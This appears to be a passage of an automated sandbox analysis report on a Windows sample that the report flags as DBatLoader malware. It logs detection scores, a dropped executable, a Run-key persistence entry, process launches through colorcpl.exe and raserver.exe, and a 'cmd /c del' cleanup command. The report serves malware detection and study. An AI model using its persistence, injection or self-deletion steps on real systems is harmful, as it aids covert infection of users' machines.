          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dll
          Source: 0321423605241625.exeReversingLabs: Detection: 35%
          Source: 0321423605241625.exeVirustotal: Detection: 40%
          Source: C:\Users\user\Desktop\0321423605241625.exeFile read: C:\Users\user\Desktop\0321423605241625.exeJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\0321423605241625.exe C:\Users\user\Desktop\0321423605241625.exe
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Libraries\Mwqrxeuz.exe "C:\Users\Public\Libraries\Mwqrxeuz.exe"
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\colorcpl.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Libraries\Mwqrxeuz.exe "C:\Users\Public\Libraries\Mwqrxeuz.exe"
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\colorcpl.exe"
          Source: C:\Users\user\Desktop\0321423605241625.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
          Source: C:\Users\user\Desktop\0321423605241625.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FMJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@11/5@8/1
          Source: C:\Windows\explorer.exeFile read: C:\Users\Public\Libraries\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0217823C GetDiskFreeSpaceA,
          Source: C:\Users\user\Desktop\0321423605241625.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\0321423605241625.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02185770 CreateToolhelp32Snapshot,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1412:120:WilError_01
          Source: C:\Users\user\Desktop\0321423605241625.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeWindow found: window name: SysTabControl32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\colorcpl.exeWindow detected: Number of UI elements: 12
          Source: Binary string: colorcpl.pdbGCTL source: raserver.exe, 00000009.00000002.556117926.0000000005257000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000009.00000002.553458668.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: colorcpl.pdb source: raserver.exe, 00000009.00000002.556117926.0000000005257000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000009.00000002.553458668.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: colorcpl.exe, 00000001.00000003.306684881.000000000503F000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000003.308280419.00000000051D9000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.493545986.00000000049ED000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.553968858.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.499251021.0000000004B8C000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.554941231.0000000004E3F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: colorcpl.exe, colorcpl.exe, 00000001.00000003.306684881.000000000503F000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000003.308280419.00000000051D9000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.493545986.00000000049ED000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.553968858.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.499251021.0000000004B8C000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.554941231.0000000004E3F000.00000040.00000800.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Yara detected DBatLoader
          Source: Yara matchFile source: 0.2.0321423605241625.exe.3baeed8.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.0321423605241625.exe.2170000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.0321423605241625.exe.3baeed8.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.308860487.0000000003BAE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.308375056.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0218F2A4 push 0218F310h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0218F0AC push 0218F125h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0218F144 push 0218F1ECh; ret
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0218F1F8 push 0218F288h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02190667 pushad ; ret
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0217C718 push ecx; mov dword ptr [esp], edx
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0217D78C push 0217D7B8h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02185488 push 021854F2h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_021844AC push 021844EEh; ret
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_021884FB push 02188554h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_021884FC push 02188554h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_021835A8 push 02183653h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_021835A6 push 02183653h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_021765FC push 02176657h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_021765FA push 02176657h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02176A48 push 02176A8Ah; ret
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0217CB4C push 0217CFA2h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02173894 push eax; ret
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0217CE1C push 0217CFA2h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0217FEA0 push 0217FF16h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0217FFA4 push 0217FFF1h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0217FFA3 push 0217FFF1h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02188C58 push ecx; mov dword ptr [esp], edx
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0218EC64 push 0218EE54h; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E6D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02186388 InetIsOffline,VirtualAlloc,GetProcAddress,FreeLibrary,VirtualAlloc,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualAlloc,VirtualProtect,FreeLibrary,
          Source: C:\Users\user\Desktop\0321423605241625.exeFile created: C:\Users\Public\Libraries\Mwqrxeuz.exeJump to dropped file
          Source: C:\Users\user\Desktop\0321423605241625.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MwqrxeuzJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MwqrxeuzJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_021854F4 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
